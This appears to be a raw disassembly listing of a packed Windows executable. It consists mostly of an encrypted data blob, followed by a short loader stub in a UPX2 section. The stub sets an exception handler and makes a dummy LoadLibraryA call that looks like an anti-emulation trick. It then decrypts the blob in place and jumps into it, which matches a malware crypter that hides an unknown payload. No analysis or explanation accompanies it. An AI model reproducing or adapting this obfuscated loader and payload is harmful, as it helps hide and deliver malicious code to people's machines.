dd 9509A226h, 10D374EEh, 11977089h, 0BD1AE469h, 9508874Ah
dd 518075F2h, 9C035B2h, 900CE56Fh, 9509A226h, 0FD374EEh
dd 1D8F13E0h, 0F900B165h, 8309F034h, 5DC964A0h, 39C071A5h
dd 9053B774h, 9514B12Ch, 0F72414A1h, 0D6F479F0h, 0BB5A2410h
dd 5674C345h, 5E597A90h, 0DBB907A0h, 1DA753Ah, 7D08B67h
dd 0DBC801A0h, 4D09E316h, 298DD7AFh, 0CB806822h, 88134202h
dd 70E05018h, 0B0209000h, 0F060D040h, 30A01080h, 70E050C0h
dd 0B0209000h, 0F060D040h, 30A01080h, 70E050C0h, 0B0209000h
dd 0F060D040h, 30A01080h, 70E050C0h, 0B0209000h, 0F060D040h
dd 30A01080h, 70E050C0h, 0B0209000h, 0F060D040h, 95237080h
dd 70D66F00h, 74851300h, 0F060E67Fh, 24E3A78Fh, 7FF8034Dh
dd 0B326DBB7h, 0D4245B90h, 3CE23BA4h, 32DB49B2h, 3B34E308h
dd 0B24BC402h, 0F035998Ch, 0F9E066FFh, 861F5485h, 73653B40h
dd 0E9423842h, 70E492A1h, 94701588h, 9488D076h, 58A01080h
dd 70E050E0h, 935D158Dh, 0C939D076h, 0B3AC6498h, 87025400h
dd 8F8015FFh, 7A3D076h, 602D1359h, 93E066E4h, 4C506F10h
dd 18E3D0CFh, 0B956F284h, 46C32D5Dh, 0B01A1300h, 0C24BD534h
dd 0BDB06283h, 2BB8AC8Eh, 0B01A135Eh, 0C29FD434h, 425F136Bh
dd 8FB7B8D0h, 7E0B6FFFh, 0CFA45D6Bh, 33F810B6h, 0FF23648Bh
dd 861F3485h, 50E51740h, 30A026BFh, 98E050C0h, 0B020903Ch
dd 0CFC055CBh, 804810B6h, 981FAF36h, 0B0209018h, 0CFC06DC3h
dd 45A010B6h, 897DD9C8h, 5B20A623h, 50ED2FDCh, 0F3A026BFh
dd 4F44D54Fh, 25A99036h, 0F056EFE0h, 30A01368h, 0B32963C0h
dd 0B0A0038Bh, 1832D040h, 0CF5FEE6Dh, 4F24C5C3h, 66239036h
dd 0F06CAAC3h, 31A7948Fh, 0A6350C0h, 342F9010h, 0F060D0BDh
dd 60AC520Bh, 8F1E9828h, 74A593FFh, 0F360E67Fh, 382A4046h
dd 4E0A940h, 9ED91019h, 1B20D334h, 31E89B71h, 0AF3FB141h
dd 49A14FDFh, 0F02C9C04h, 1BF9FCF5h, 8A19D308h, 0B0971F0Fh
dd 7106D040h, 293EEF8h, 704BD5CFh, 33769000h, 0F515D07Ah
dd 0DBB05A0Bh, 73EADBC2h, 0C2C8C1F1h, 0F39F2FBEh, 69FD435h
dd 0B065FDC0h, 342F6B78h, 0F060D0C4h, 0F64A57Fh, 98B050F6h
dd 4FDF6E55h, 0CFA45543h, 0B52F10B6h, 70D66F04h, 0E3049403h
dd 0C36210C3h, 38161F5Bh, 0B9604223h, 94E1C320h, 0EC49D464h
dd 14AC39A4h, 990B109Bh, 672F6B81h, 0CE140DFBh, 7508EB01h
dd 46948BAEh, 8B796B81h, 0DE142FE1h, 1276EB01h, 5694FC75h
dd 59B36B81h, 0EE142318h, 0D9DDEB01h, 6694A398h, 8F666B81h
dd 0FE143165h, 0F90EB01h, 7694B1E5h, 8F8405FFh, 193BD076h
dd 0CF5FEFF1h, 6422D39Eh, 4FDE7FE9h, 9A6113BFh, 60484884h
dd 0F81FAF35h, 8606BA95h, 0C1D8B640h, 0F0421298h, 92E25324h
dd 0B64A3B66h, 5553818h, 0F223EF7Fh, 1A31D7C8h, 98C8C805h
dd 709F2FB5h, 3BD3137Ah, 0F5E20070h, 0B016B62Ah, 9A473BEAh
dd 0B00A48E8h, 6895533Ah, 0B8C881B0h, 489F2FB5h, 30A01081h
dd 7D948244h, 7ADE70D1h, 0F58B26ABh, 30A01038h, 0CF02FB40h
dd 2CB51DC3h, 0DB60E678h, 0F37AE757h, 486FD537h, 0B0209036h
dd 656FD840h, 3B40D140h, 486DD536h, 0C5219036h, 796DB646h
dd 0C6B3FBA5h, 46D8DD45h, 0B6559200h, 0D551DD26h, 3DC6146Bh
dd 0DB8675C1h, 4FDF2CE8h, 0C4235BBFh, 0F188509h, 0B34B50F6h
dd 88AF15F7h, 0F060D076h, 0A5AF1880h, 0DA5C5400h, 4FDF0CE8h
dd 4CF559BFh, 0C6A026BFh, 46D8DD45h, 0B4559100h, 0F28BE14Fh
dd 0F30BD0ABh, 486FD537h, 0B0209036h, 0D714D840h, 829950Ah
dd 902150F6h, 3B2DF60Bh, 40CBB605h, 0B52ABA78h, 70D66849h
dd 0B53B70C1h, 0F6E9B427h, 5660232Bh, 0C8F2BB6Bh, 0B0251F64h
dd 79E55AEBh, 34A026B8h, 68009198h, 4C9053ABh, 4806F0ABh
dd 9BC6106Bh, 748A492Bh, 44397858h, 0F4ED2FBFh, 3840D152h
dd 0B06955A6h, 0B3CB3B66h, 9ACA40F0h, 30484882h, 0F41FAF34h
dd 0DA12E4D2h, 4888848h, 0CE5FEF73h, 423220Ah, 0C4EA6EC5h
dd 84AA2E89h, 446AEE5Bh, 42AAECCh, 0C4EA6E0Ch, 1B99604Ch
dd 0DB5DA04Dh, 9B15E009h, 5BD820C5h, 4DED1381h, 3096281Ch
dd 486FD537h, 0B0209036h, 0F3145040h, 0C70A7030h, 46D8DF45h
dd 0B0209000h, 4867A448h, 304C9BD5h, 0F5171F6Bh, 0B016A88Fh
dd 0F160D043h, 3077948Fh, 985050C0h, 0DA93BAAh, 0F056EFE8h
dd 9B0AF830h, 4F4CED49h, 35D79036h, 0F056E8CFh, 30A01083h
dd 0F51745B4h, 0B016A88Fh, 0F160D040h, 0F14815F4h, 0C01FAF3Eh
dd 3B8B3AE9h, 0C65F78C5h, 1B6F9B80h, 0C05DD908h, 3920A63Fh
dd 97D82C08h, 9B96EFE4h, 0DB8690F3h, 88AF15F7h, 0F063D076h
dd 3ED41080h, 486DD536h, 0C4A09036h, 0E223845h, 5718EF7Fh
dd 0DBC6D9A4h, 1B465033h, 0C8EF55B7h, 30A310B6h, 259450C0h
dd 88AD15F6h, 85E0D076h, 0CEBEF885h, 0D408AF3Fh, 0DF6FFDh
dd 0BD63860h, 943EF7Fh, 651FE8A6h, 1BB13B66h, 0C8EF45CBh
dd 0E25710B6h, 70E39237h, 0A4559000h, 0F9DAEA8h, 0D8BFA07Fh
dd 8F1FAB50h, 0A5DF2866h, 5BF17B26h, 0B52BDF0Bh, 70D66F70h
dd 0F8A9582Bh, 7FE527BCh, 33A026B8h, 4E050C0h, 3FA5672Eh
dd 0F060E678h, 44A61080h
dd 0FF65A7E2h, 0B020A638h, 8561D040h, 0CD52F885h, 0F517AF3Fh
dd 0B016A88Fh, 0F460D040h, 3D4815F4h, 871FAF3Eh, 86181F85h
dd 0F060D440h, 0D8B76480h, 8F1FAEA7h, 4EE0B9B8h, 0F8D87B88h
dd 9BA46440h, 9B182578h, 35D73B67h, 0F056E8CFh, 30A01088h
dd 0CD601FB5h, 0B016A88Dh, 1826A440h, 0CF5FEEBBh, 59F87978h
dd 39859AC9h, 3060E678h, 95AA1364h, 70D66849h, 1A9120ABh
dd 0C8ED55CAh, 800A10B6h, 0F9655A80h, 1A20A638h, 0D826826h
dd 82F9577h, 70F050F6h, 0B7549000h, 96CA99F0h, 565C6538h
dd 0DA08E06Bh, 398B5033h, 0C65F44FDh, 0BF25E780h, 50E066F8h
dd 0C5209000h, 0FA386049h, 6989705h, 0C886FAC0h, 35D75081h
dd 0F056E8CFh, 30A010C0h, 0B46053B4h, 37859A28h, 9660E678h
dd 0A81D992Bh, 0DBE066FFh, 88AF15F7h, 0F060D076h, 39D55080h
dd 0F5E20070h, 0B016A887h, 7FE527EAh, 0B0A026B8h, 5E050C0h
dd 0BA98200Bh, 0C65858C5h, 0D4BBA80h, 68D1E8A6h, 88AF15F7h
dd 0F160D076h, 32D41080h, 0D5EA7970h, 0B016A888h, 0FA633480h
dd 6989825h, 164B36C0h, 47D011B8h, 0C6585FC5h, 30A21080h
dd 0C4E225C0h, 38859AC8h, 9660E678h, 841D992Bh, 0C8E066FFh
dd 0B020B89Ch, 7FE527EBh, 38A026B8h, 4E050C0h, 4D117871h
dd 75972FBFh, 3096280Fh, 70E054C0h, 8909B75h, 0C8E9554Ah
dd 0DB0A10B6h, 0FF65A78Dh, 0B020A638h, 8560D048h, 0B3187691h
dd 0F9455A20h, 0D620A638h, 5AA0E3EBh, 88C6056Bh, 0D5EA48E9h
dd 0B016A889h, 0FA633480h, 6989925h, 874B36C0h, 86181F85h
dd 0F070D040h, 0B1187680h, 0F0E32400h, 152A98C4h, 0F056E8C9h
dd 86AFBBE6h, 46D8DD45h, 70C83B00h, 79F2FBCh, 6989F05h
dd 70E050C0h, 29E440h, 77E5D210h, 9AA026B8h, 486FD537h
dd 90209036h, 76D0D040h, 34A412F5h, 0FA1E1F4Dh, 861817A5h
dd 6CED5940h, 56A026BFh, 751CD06Bh, 0B0909775h, 0B09F9FC0h
dd 0CCD9F82Ah, 0F517AF3Fh, 0B016A88Fh, 0F0609040h, 1C6A8E6h
dd 595452B5h, 0A8903B66h, 0C8E9554Ah, 0D06010B6h, 2408FAC3h
dd 0DF6FFCh, 7FE527C8h, 30A026B8h, 5E05040h, 3AA62002h
dd 0C65857E5h, 0B00B7680h, 7795553Ch, 0FFA090B0h, 18CA90BFh
dd 0CF5FECABh, 486FD537h, 0B0209036h, 0FB15D041h, 0B5AA5030h
dd 70D66847h, 0D62F7BAAh, 0FAA053F8h, 6989725h, 0C04B36C0h
dd 35D73A01h, 0F056E8CFh, 30A21080h, 0F5177FB5h, 0B016A88Fh
dd 0F064D040h, 0F0100AF5h, 4869D5CAh, 15AA9036h, 0F056E8CEh
dd 56B0F041h, 0DB613678h, 0B8CB90B0h, 756A90F0h, 30962809h
dd 0FF65A76Ah, 0B020A638h, 8560D840h, 0B3187690h, 0F8455A28h
dd 0D620A638h, 1B6160EBh, 3AE8A088h, 46D8D845h, 35D73A00h
dd 0F056E8CFh, 30B01080h, 55952571h, 48A32866h, 0C8E8754Ah
dd 9BC610B6h, 594A90F3h, 861F0CBDh, 7FE52740h, 30A026B8h
dd 5E070C0h, 5B57211Fh, 0F9D8B65Bh, 0B8051A98h, 0B0E066F8h
dd 152A93E4h, 0F056E8C8h, 8D89BBE6h, 70D66F5Ch, 15AA518Ah
dd 0F056EFDCh, 6810BBE6h, 4867D5C2h, 478A9036h, 0C6585FC5h
dd 30A01380h, 87C224C1h, 86181F85h, 0F060D040h, 0C7B66584h
dd 46D8DF45h, 0B0209000h, 1865A543h, 0CF5FEA04h, 8F1AFB28h
dd 3FA567FFh, 0F060E678h, 44A81080h, 0DA29E0C3h, 88AF15F7h
dd 0F060D076h, 10D49080h, 0F5CA5770h, 0B016A887h, 0FD7A3081h
dd 30841809h, 4867F5C2h, 54E09036h, 0F4A45043h, 9AC1A02Bh
dd 901FE8A6h, 88A7350Ah, 5B06D076h, 82F9577h, 70C050F6h
dd 0E3549000h, 0C8EF55B7h, 30A010B6h, 7D9470C0h, 0B02357F7h
dd 0F514D040h, 0DB0A8030h, 0FB27DB33h, 861F048Dh, 79A1FB40h
dd 6810ECC1h, 4867D5CAh, 478A9036h, 0C6585FC5h, 70A01080h
dd 16EC24C0h, 0BAE3C0B8h, 0C65857C5h, 56AAFB80h, 7A00AF78h
dd 861817A5h, 7CBB640h, 6989F05h, 70E053C0h, 4753E401h
dd 0C6585FC5h, 30A01080h, 87ED24E0h, 0B02093C7h, 4065A440h
dd 0C34BBA10h, 0F56B9F4Bh, 0B016AFACh, 0B8E9186Bh, 0C769237Ch
dd 46D8DF45h, 30209000h, 7D6EA540h, 6989705h, 30E8DAC0h
dd 0C3236980h, 3D645DB8h, 30B034C4h, 0C0E8B001h, 0B6C33B8Bh
dd 30516826h, 88C6BBE6h, 0C888D04Fh, 0B2209000h, 0A8CBB6A1h
dd 4569952Bh, 415836C6h, 8BF6C0h, 75ED7A83h, 3096281Ch
dd 486FD537h, 0B0209036h, 0F615C040h, 68583BD7h, 236B492Bh
dd 9BD8BB28h, 44ED5B90h, 31A026BFh, 46DFC455h, 3B199100h
dd 7964F404h, 6B0793Dh, 0E85DDBC0h, 9B20A63Fh, 0C65F44C5h
dd 0BF25E780h, 30E066F8h, 0C4209000h, 5BB82742h, 66A01442h
dd 0BC5DD397h, 0B020A63Fh, 0F1B9544Fh, 3D481080h, 3BE050C0h
dd 0F56EC245h, 0DE52E30Ch, 30EC5CC4h, 4B9EC53Fh, 35A99036h
dd 0F056EFA0h, 0CF89BD3h, 31F88C3h, 84631B28h, 0F9530A8h
dd 0F0359B7Fh, 2BE066FFh, 392CD203h, 0C65F34C5h, 38E21380h
dd 4F08D549h, 0C3AB9036h, 70D32F68h, 0D8A01080h, 8F1FA579h
dd 8FE02D8Bh, 1836D076h, 0CF5FE52Dh, 4F20C54Bh, 0FAAB9036h
dd 0FC2AD348h, 0D923DEABh, 10685FC5h, 0BF209001h, 0F0618AC4h
dd 0F4151380h, 73E066FFh, 861F14B5h, 185C7C40h, 3002958Fh
dd 366D50C0h, 34A5BB04h, 0F360E67Fh, 5A484086h, 0F31FAF35h
dd 861F50BDh, 0FB15D040h, 3FAC57BBh, 70E14B43h, 892C7B00h
dd 0C65F10D5h, 3D251F80h, 73E050C1h, 861F1485h, 0C8E1B640h
dd 0B5AF357Fh, 70E0503Ch, 9B22D08Bh, 1830E403h, 0CF5FE5ADh
dd 4F20EDF9h, 352F9036h, 0F060D0A4h, 0F649583h, 0F5E350F6h
dd 0B016AF84h, 0B74BD0CBh, 0FD221F8Ch, 4BE050C0h, 332F9847h
dd 0F060D084h, 33A2D003h, 0F5E34487h, 0B016AF84h, 459F8012h
dd 30962F60h, 4BDEC53Fh, 357A9036h, 47E5DF80h, 0D9A01080h
dd 70E0505Ch, 352F6F3Ch, 0F060D0D4h, 3FB52E00h, 70E0DB45h
dd 0B1661B00h, 0A054936Bh, 0CF54AC68h, 0B05D693Fh, 0C520A63Fh
dd 34E5D337h, 33A026BFh, 46DFD445h, 5CA51900h, 7B60E67Fh
dd 0D4252B80h, 2E066FFh, 58A5AB08h, 8260E67Fh, 30A02DE9h
dd 479220C0h, 0B0208FE8h, 0C2E5D40h, 328BD10Bh, 4BF012C3h
dd 861F7C85h, 736CA540h, 15F0044h, 6CC4144Fh, 733B7B61h
dd 0CFC455CFh, 0BBC010B6h, 46DFD475h, 457A7800h, 59012FBFh
dd 0B0A01080h, 37CB5EB5h, 8B29E20Ch, 726FD807h, 0CF5FEFBCh
dd 0C2655F89h, 3BDF6FFEh, 57E1F47Ch, 30A0380Fh, 0F1FAF3Fh
dd 0FAA1D2EBh, 0F060B064h, 0F0935E60h, 0F7C45C4Bh, 861F5C85h
dd 38E55940h, 0BDA026BFh, 70C8C379h, 34A59300h, 9660E67Fh
dd 1BEEB525h, 64A25306h, 762CD22Bh, 37882B06h, 30A04401h
dd 70E055C0h, 4C661900h, 0A7A38E1Fh, 0B2A857Fh, 982150F6h
dd 0AAA59F1Fh, 0A060D041h, 5A887AD4h, 9A75AF3Fh, 3520A63Bh
dd 786F8F80h, 30A01185h, 8F050A28h, 0B03178FFh, 9533D040h
dd 5CC956F4h, 138503A5h, 0C449E275h, 0F609139h, 69F4835h
dd 4E75AFC0h, 3920A63Bh, 0C65FB0C5h, 30B9F880h, 15B350C0h
dd 0D54BF154h, 950EA70Fh, 59C863F2h, 199200B0h, 0D54CF976h
dd 0A760B527h, 0CF493B68h, 70F3B83Fh, 0D5739000h, 8413B512h
dd 60C562EFh, 199639B2h, 0D547F56Ch, 0FD888740h, 0D85FEF69h
dd 70E050D2h, 0D162F553h, 8015BB23h, 46C962D0h, 17853CA9h
dd 58779065h, 0F9F38B0h, 30A00868h, 338503C0h, 0D74EF168h
dd 840F9E25h, 60D976E9h
dd 199639B2h, 0D547F56Ch, 3D888740h, 605FEF68h, 0EC65DD94h
dd 0DA20A63Ah, 0F10A8024h, 0C635EFD7h, 0F9E066FBh, 25DFB43Ch
dd 0F056EB72h, 8D2DD0AAh, 70D66E94h, 4F70C050h, 0C65A4CF5h
dd 30A17880h, 1AB450C4h, 25DFC701h, 0F056EF20h, 67A47AD4h
dd 4F80C53Fh, 74A39036h, 0A8D52F54h, 0CFA026BFh, 46DB3E55h
dd 3DE3CF00h, 0C65E84F5h, 0A55F4680h, 70D66BB2h, 0BFDF6883h
dd 0F0606BC4h, 54259980h, 1AE066FFh, 25DFC600h, 0F056EBEEh
dd 0B4AFD005h, 70E05064h, 0E070502Bh, 9A30D32Ah, 30A07881h
dd 8FB690C0h, 861BDE95h, 0F985340h, 3548948Fh, 0F56950C0h
dd 0B016AF68h, 0CF0C5DCDh, 0A52D10B6h, 70D66FB4h, 0B04AC251h
dd 8AF52F10h, 0B3A026BBh, 0F4EFAF38h, 0B02095B6h, 459FD02Ah
dd 30962FE8h, 4B96C53Fh, 48A39036h, 6FE4DFBFh, 0B9A01085h
dd 46DF2C45h, 0B3E9A300h, 0A1308183h, 0CFF114EAh, 46DF3875h
dd 0E2B56F00h, 7560E67Bh, 4B241F40h, 43E050C5h, 30A519C9h
dd 0A160E67Fh, 2FC841D1h, 20E05FC0h, 8BBA05FFh, 30E5D076h
dd 3594948Fh, 0F56950C0h, 0B016AF84h, 9F936883h, 7B2B1080h
dd 0FF65A7F8h, 0B020A638h, 8570D040h, 59251386h, 43E066D0h
dd 47E193D2h, 798127B1h, 69F8005h, 587BE8C0h, 0FBAB9000h
dd 99E5D37Ch, 3A02690h, 87215312h, 39C167F1h, 0C65F58C5h
dd 87AFD380h, 9319568Bh, 0A8731D35h, 0E423674Fh, 5BE9C083h
dd 0A0E37801h, 0C77FAA81h, 8499BE29h, 3CDA939Dh, 0FB0022C1h
dd 0F2ABAC4Bh, 0E022D354h, 0CFE8540Dh, 0B1C38937h, 8F5C153Bh
dd 7BA3D076h, 3B034D4h, 0C862DF00h, 73209000h, 0FB8B1FCBh
dd 0EF4AD0Dh, 0FB1C50F6h, 1CE9A3DFh, 0F612B17Ch, 32D76ABCh
dd 4C4A70ECh, 8CCCE45Ch, 0CCBDA46Eh, 0D3486580h, 4DE1DB09h
dd 0B065C845h, 0A35DDB34h, 3FA042C3h, 8F1F6345h, 8D231BFFh
dd 0B32E9917h, 0CF86948Fh, 27DDAF3Fh, 0BF6EC543h, 0F9FCBC4h
dd 73F72D7Fh, 0F4EF62F3h, 4FDF6F10h, 0A433807Dh, 35241FCFh
dd 431FAF3Fh, 4E0D78DBh, 0E0152FBFh, 0CF5CEA68h, 8EC1B83Fh
dd 342F6FFFh, 0F9F2EACh, 2648C2B3h, 98E050C0h, 4FDF6F63h
dd 0F060D0A8h, 0DD214D80h, 70D663FDh, 0B0234BE9h, 0C29FB440h
dd 0F24A50Bh, 0F98450F6h, 8EA1F622h, 756F8A0Dh, 30A01344h
dd 73DC0E4Bh, 8BA1F6DEh, 756F9510h, 30A01334h, 70F61337h
dd 0BF209020h, 0F06377C5h, 6CE3E680h, 0ED645FC2h, 3B209003h
dd 505DD803h, 3F00B020h, 70E3DF44h, 9000AD00h, 746FF060h
dd 30A01304h, 8F1EE928h, 0C9A29FFFh, 7360D043h, 69FD825h
dd 326B50C0h, 0A06A1B08h, 0F413116Bh, 354BD0B3h, 3A6998C3h
dd 3CA51910h, 0F360E67Fh, 30181CCAh, 21E051C0h, 4FC73AE8h
dd 7DF5E0BFh, 81A026B8h, 0FE5560E0h, 0DA20A638h, 0A8A92E60h
dd 0A04804F8h, 0F51FAF27h, 72B49FD2h, 65513293h, 3096280Fh
dd 0F517B52Bh, 0B016A88Fh, 0F160D040h, 0B55732F4h, 70D6684Fh
dd 0B0209003h, 55E1DC35h, 3096280Fh, 8B1FAF3Fh, 3DA19AEBh
dd 0F056E8CFh, 38A01080h, 70E056A8h, 0B648C900h, 0A860D040h
dd 0CF475268h, 0F765DA3Fh, 3620A638h, 0C8E7FAC4h, 0B52810B6h
dd 70D66847h, 35D770E2h, 0F056E8CFh, 30A01088h, 0CD6059B5h
dd 0B016A889h, 7A5A441h, 6989F05h, 70E050C0h, 303BE408h
dd 0C65857FDh, 80D41580h, 4868ED40h, 0C4259036h, 79DD50E7h
dd 35A026B8h, 0F517CEB4h, 0B016A88Fh, 7060D040h, 8D2019F4h
dd 70D66847h, 33A9E702h, 0C65F1CE5h, 37481080h, 981FAF33h
dd 4FDF6D61h, 0F062A0A8h, 0B83D9B80h, 73E066FFh, 861F1C9Dh
dd 0C193840h, 0B4AFEF7Fh, 70E05290h, 8FA4258Bh, 0AEEBD076h
dd 0D87E13BCh, 8F1FADBAh, 0B21A120Fh, 0BAE1D040h, 30A070A4h
dd 221EDB20h, 0A45A9356h, 770AA43h, 6989F05h, 70E050C0h
dd 3934E510h, 0C65F00FDh, 0AC159D80h, 0FBE066F8h, 8630F98Dh
dd 0A7C42340h, 30AA3739h, 7055DDC0h, 4320A610h, 136061E5h
dd 0C704E382h, 46D8DF45h, 0B0209000h, 5EE4DF50h, 0CFA01080h
dd 0C60878B3h, 3BDF6FEEh, 0C65F10D5h, 3F729580h, 70E0C844h
dd 34951B00h, 7B60E67Fh, 7A2100CAh, 70E030E4h, 0B86ABBE0h
dd 3953D233h, 0BB46283h, 46F0394Dh, 0D9AD1B00h, 8260E650h
dd 149C9BD6h, 6089F543h, 33209036h, 0F060B9E7h, 4A2B1080h
dd 78AA51C8h, 47A76703h, 0CFF855CBh, 0B55710B6h, 70D6684Fh
dd 0B0209040h, 0E897D234h, 19AC6283h, 0BC55D9F0h, 3B20A63Fh
dd 0C061F833h, 82F9577h, 70A050F6h, 0B2549000h, 1831C8B7h
dd 0CF5FECC9h, 73ECBB99h, 0C20BB873h, 336814Ch, 0BDF94F24h
dd 46D8CC75h, 609D1900h, 360E67Fh, 3FFE4F24h, 0F76DC2F1h
dd 0B02090D5h, 0C8ED457Ah, 36D510B6h, 269882A9h, 0E0A88234h
dd 2AD838B0h, 0BBFAEF7Fh, 3AE35C8Ah, 3FA56710h, 0F060E678h
dd 0BDB01080h, 63955581h, 8FEC1D89h, 7563D076h, 309600E9h
dd 7089F743h, 9B209000h, 77E9F803h, 30A010D4h, 4CACD537h
dd 0B0219036h, 0F714D040h, 90A85347h, 8740F060h, 86181F85h
dd 0F060D040h, 62A76400h, 8F172A28h, 3DABCAFFh, 0F056EF8Ch
dd 7B291563h, 0FBEDBBE8h, 861F588Dh, 1B623340h, 18EB9B83h
dd 486FD537h, 0B0239036h, 0E414D040h, 0F70950Bh, 0FDE350F6h
dd 0B016AFBCh, 0CFD85543h, 38A110B6h, 0FBF01A4Bh, 861F1885h
dd 0F82AE940h, 7A2913F3h, 60A251C8h, 0B078F383h, 0CFF055CBh
dd 0ACC810B6h, 71E050E8h, 0B1799842h, 65EA8003h, 3096280Dh
dd 486FD537h, 0B0209036h, 0F614C040h, 20C99D83h, 705650F6h
dd 88AF15F7h, 0F060D076h, 24D51082h, 0F517963Eh, 0B016A88Fh
dd 0F064D040h, 852A16F5h, 70D6684Eh, 88AF15F7h, 0B060D076h
dd 3BD51080h, 0B2E2574Ah, 52F692AAh, 7A693BB7h, 9A622287h
dd 870286C2h, 3B444233h, 0F2EFB462h, 581D93D8h, 70E066FFh
dd 4AFE140Fh, 459F2FBFh, 30962F04h, 4B5EC53Fh, 5DF9036h
dd 0F056EFC0h, 0B92857Fh, 0FD6D50F6h, 0B016AF6Ch, 0CF1445CDh
dd 62F110B6h, 0C51F50AAh, 0B016AF68h, 0CBD245BFh, 855F10B6h
dd 70D66FA8h, 8B1205FFh, 45EDD076h, 30962ED4h, 4F84E53Fh
dd 4F769036h, 0C65B7ED5h, 58059380h, 70E066FFh, 0B02078C3h
dd 9A3DD040h, 0AA4D9181h, 28E066F7h, 35E19FF0h, 0F056C538h
dd 0B363D005h, 7F10AF08h, 0A55815C1h, 0CDA3D076h, 308A1090h
dd 0F1864CB5h, 0DC2CB47Ch, 9073A531h, 0CF5FD468h, 98E5253Fh
dd 4FDF6AD4h, 0F9F02A8h, 0CF8E717Fh, 44B628EDh, 0B0052812h
dd 1800D040h, 0CF5FEF25h, 346B69B5h, 5ADA024h, 0F056EE14h
dd 56A8400Bh, 72E66A41h, 0D876B573h, 0F09FD040h, 30CAD40Bh
dd 0E51F0092h, 0B016ABFEh, 716814C3h, 0F9F4CBEh, 0F3E3259Ch
dd 31C894C6h, 189F2FBAh, 0CF5FEFFFh, 45893A1h, 5B209000h
dd 0F04F68F1h, 2D481080h, 0B2E050C0h, 80989020h, 1860D040h
dd 30A01090h, 0C8E07402h, 0B0209185h, 0F060D3A8h, 308CD280h
dd 7CC4044Dh, 48A3BECDh, 9079AC40h, 30A01068h, 54B4DBC0h
dd 0AAABCD30h, 0C8113DC1h, 0E44810B6h, 111FAF21h, 0B32094C2h
dd 0F562D741h, 99F5DF86h, 0FF39420Fh, 119415h, 498D01h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_315148B3
call loc_31514928
mov ebp, 36EFE886h
jmp loc_315148EE
; =============== S U B R O U T I N E =======================================
sub_315148B3 proc near ; CODE XREF: UPX2:3151489F�p
push dword ptr fs:0
mov dword ptr ds:loc_3150920A+4, ebp
mov fs:0, esp
xor eax, eax
push eax
push eax
push 4000h
push eax
push 10h
push 80000000h
push 80000000h
push eax
push 80000000h
push eax
push eax
push eax
push eax
call ds:dword_3150908C ; LoadLibraryA
loc_315148EE: ; CODE XREF: UPX2:315148AE�j
call $+5
pop ecx
sub ecx, 0FFFFE257h
push ecx
sub esi, esi
xor esi, 2935h
sub edi, edi
add edi, 92h
loc_3151490B: ; CODE XREF: sub_315148B3+66�j
mov al, [ecx]
sub ax, di
xchg al, [ecx]
inc ecx
sub esi, 1
cmp esi, 0
ja short loc_3151490B
pop ecx
mov edi, [ebp-8]
mov fs:0, edi
leave
jmp ecx
sub_315148B3 endp
; ---------------------------------------------------------------------------
loc_31514928: ; CODE XREF: UPX2:315148A4�p
mov ecx, [esp+10h]
xor [eax], eax
; ---------------------------------------------------------------------------
dw 0
dd 1A9h dup(0)
dd offset loc_31512000
dd 100Ah dup(0)
UPX2 ends
; Section 4. (virtual address 00019000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00019000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31519000h
align 2000h
_idata2 ends
end start